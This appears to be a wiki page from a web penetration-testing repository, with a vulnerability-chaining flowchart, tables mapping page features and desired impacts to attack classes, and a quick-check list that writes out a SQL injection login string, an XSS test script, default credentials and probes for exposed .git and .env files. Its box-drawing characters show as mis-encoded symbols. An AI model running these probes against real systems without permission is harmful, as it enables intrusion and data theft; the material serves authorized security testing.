βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β Low Impact β β Medium β β Already β
β (Reflected β β (Stored XSS, β β Critical β
β XSS, Info β β CSRF, IDOR) β β (RCE, SQLi) β
β Disclosure) β β β β β
βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ
β β β
βΌ βΌ βΌ
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β CAN YOU: β β CAN YOU: β β CAN YOU: β
β β’ Redirect to β β β’ Escalate β β β’ Pivot to β
β stored XSS? β β privileges? β β internal? β
β β’ Use in β β β’ Chain with β β β’ Access new β
β phishing? β β CSRF? β β targets? β
β β’ Pair with β β β’ Combine β β β’ Chain for β
β open redir? β β with LFI? β β persistence?β
βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ
β β β
ββββββββββββββββββββΌβββββββββββββββββββ
βΌ
βββββββββββββββββββββββ
β Chain identified? β
β Report as single β
β finding with chain β
β PoC β
βββββββββββββββββββββββ
| I See... | Test For... | Methodology File |
|---|---|---|
| Login form | SQLi, Brute Force, Session Fixation, NoSQLi |
SQL Injection.md, Bruteforcing.md
|
| Search bar | SQLi, XSS (reflected), SSTI, Command Injection | Multiple |
| Profile page | Stored XSS, IDOR, CSRF |
xss.md, IDOR.md, CSRF.md
|
| File upload | Unrestricted Upload, XXE, XSS via SVG |
File Upload Vulnerabilities.md, XXE.md
|
URL parameter ?url=
|
SSRF, Open Redirect, LFI |
SSRF.md, Open Redirect.md, LFI and RFI.md
|
| OAuth login | Redirect URI bypass, CSRF, State injection | OAuth.md |
| JWT in headers | Algorithm confusion, Signature bypass | JWT.md |
| GraphQL endpoint | Introspection, Batching, Depth attacks | GraphQL.md |
| API endpoints | IDOR, Mass assignment, Race condition |
IDOR.md, API Penetration.md
|
| Email functionality | Header injection, SSTI, SSRF in templates | Email Attacks.md |
| WebSocket | CSWSH, Message manipulation | WebSocket Exploitation.md |
| WAF/CDN | Bypass, Origin IP, Request Smuggling |
WAF.md, HTTP Request Smuggling.md
|
| Cache headers | Cache poisoning, Cache deception | Web Cache Deception.md |
| CORS headers | Origin reflection, Null origin | CORS.md |
| Iframes | Clickjacking, Tabnabbing |
Clickjacking.md, Tabnabbing.md
|
| CSP header | Bypass via CDN, Script gadgets | csp.md |
__proto__ in JS |
Prototype pollution | Prototype Pollution.md |
| XML input | XXE, Billion laughs | XXE Vulnerabilities.md |
| Serialized objects | Insecure deserialization | Deserialization.md |
| Race-prone endpoint | Race condition | Exploiting Race Conditions.md |
| Desired Impact | Target These Vulnerabilities |
|---|---|
| RCE (Remote Code Execution) | File Upload, SSTI, Deserialization, Command Injection, SQLi (xp_cmdshell) |
| Data Exfiltration | SQLi (UNION), XXE, SSRF (cloud metadata), IDOR |
| Account Takeover | XSS (session theft), CSRF (password change), JWT bypass, OAuth flaws |
| Privilege Escalation | IDOR, Mass Assignment, JWT claim manipulation, Prototype Pollution |
| Internal Network Access | SSRF, DNS Rebinding |
| Denial of Service | Billion laughs (XXE), GraphQL depth attacks, Race conditions |
| Phishing Enablement | Open Redirect, Tabnabbing, Clickjacking |
| Persistent Access | Web Shell, Web Cache Poisoning, Stored XSS |
When you have limited time, prioritize these checks:
| Action | Tool/Technique | Expected Time |
|---|---|---|
Check robots.txt, sitemap.xml
|
Browser | 30 seconds |
| Try default credentials |
admin:admin, test:test
|
1 minute |
Check for .git/, .env, .DS_Store
|
Browser/curl | 2 minutes |
Test ' OR 1=1-- on login |
Manual | 2 minutes |
Test <script>alert(1)</script> in search |
Manual | 2 minutes |
Check Access-Control-Allow-Origin: *
|
Burp/Debugger | 2 minutes |
| Look at JS files for API keys, endpoints | Browser DevTools | 5 minutes |
| Action | Focus |
|---|---|
| Find all parameters (query, body, headers) | Burp/Gobuster |
| Test sequential IDs for IDOR | Manual/Burp Intruder |
| Test redirect-related parameters for Open Redirect | Manual |
| Test URL parameters for SSRF | Manual |
Add ?debug=true, ?test=true
|
Curiosity-driven |
| Action | Focus |
|---|---|
| Pick the most promising input and go deep | Your instinct |
| Try bypass techniques from cheatsheets | resources/cheatsheets/ |
| Chain any two findings together | Phase 7 above |
| Document everything for future reference | Your notes |
| Knowledge Base | Tools | Project |
|---|---|---|
| Methodologies Β· Cheatsheets Β· Write-ups Β· Course | Automation Β· Exploitation Β· Recon | Security Policy Β· Code of Conduct Β· License |
β οΈ This repository contains real exploitation techniques. Unauthorized use is a criminal offense under the CFAA, Computer Misuse Act, and equivalent laws worldwide. Use only on systems you own or have explicit written permission to test.
Β© 2026 aw-junaid Β· MIT License
For Security Researchers
Methodologies β’ Cheatsheets β’ Tools β’ Write-ups
- π Wiki Home
- β FAQ
- π Project Overview & Philosophy
- π Getting Started Guide
- π€ How to Contribute
- π Course Materials
- πΊοΈ Repository Structure
- π Glossary of Terms
- βοΈ The Master Attack Flow
Core vulnerability exploitation guides
- API Security Testing
- Brute Force Attacks
- CORS Exploitation
- CRLF Injection
- CSRF
- Clickjacking
- Crawling & Fuzzing
- DNS Rebinding
- Deserialization
- Email Attacks
- Exploit Broken Links
- Race Conditions
- File Upload Vulnerabilities
- GraphQL Security Testing
- HTTP Parameter Pollution
- HTTP Request Smuggling
- Hashes
- IDOR
- Injection Exploitation
- LFI & RFI
- OAuth
- Open Redirect
- Prototype Pollution
- SQL Injection
- SSRF
- SSTI
- Session Fixation
- Supply Chain Attack
- Tabnabbing
- VHost
- Web Cache Deception
- WebSocket Exploitation
- Webshell
- XXE Vulnerabilities
- Cookies Padding
- CSP
- Header Injection
- Cross-Site Scripting (XSS)
Platform-specific exploitation guides
- ASP.NET
- Apache Tomcat
- CI/CD Security
- ELK Stack
- Exploitation Methodologies
- Buffer Overflows
- C2 Frameworks
- File Transfer Exploitation
- Firebase
- Firebird Database
- Flask Application
- From Recon to Root
- GitHub Security
- GitLab
- JWT
- Jenkins
- Joomla
- Linux Kernel Exploitation
- MFA/2FA Exploitation
- NoSQL Injection
- OAuth Exploitation
- OpenID Connect
- Privilege Escalation
- Remote Code Execution
- Reverse Shells
- SaaS Security Testing
- WAF
- WebDAV
- WordPress Penetration Testing
Quick-reference payloads & commands
- API Security
- ASP.NET
- Broken Links
- Bruteforcing
- Buffer Overflow
- CRLF Injection
- CSRF
- Clickjacking
- Command Injection
- Cookie Padding
- Crawling
- CORS
- CSP
- DNS Rebinding
- DavTest
- Deserialization
- Elasticsearch
- Email Attacks
- File Transfer
- File Upload
- Firebase
- Firebird
- Flask
- GitHub Security
- GitLab
- GraphQL
- HTTP Parameter Pollution
- HTTP Request Smuggling
- Hashes
- Header Injection
- IDOR
- JWT
- Jenkins
- Joomla
- Linux Kernel Exploits
- LFI & RFI
- MFA/2FA
- Modern C2 Frameworks
- NoSQL Injection
- OAuth
- OAuth 1.0
- OpenID Connect
- Open Redirects
- Payloads
- Ports
- Privilege Escalation
- Prototype Pollution
- Race Conditions
- Recon & Exploitation Reference
- Reverse Shells
- SQL Injection
- SaaS Security Testing
- SSRF
- SSTI
- Session Fixation
- Supply Chain Attacks
- Tabnabbing
- Tomcat Security Testing
- VHosts
- WAFs
- Web Cache Deception
- Web Exploits & C2
- Web Sockets
- Webshells
- WordPress
- XXE
- XSS Cheatsheet
- Web Penetration Commands
π View All 68 Cheatsheets
All cheatsheets are interlinked with their corresponding methodologies. Use the search function (press
t on GitHub) to find a specific one quickly.
- π Bug Report Template
- π Custom Subdomains Wordlist
- π Directory Brute Force Wordlist
- π XSS Payloads Wordlist
βοΈ Automation
π₯ Exploitation
π Reconnaissance
π§ Utilities
| Link | Destination |
|---|---|
| π Wiki Home | Home |
| π Repository | GitHub |
| β FAQ | FAQ |
| π Report a Bug | Security Policy |
| π License | MIT License |
| π¬ Discord | Join Server |
β‘ Stay curious. Hack ethically. Report responsibly.
Β© 2026 @aw-junaid β’ Built with π¬ for the security community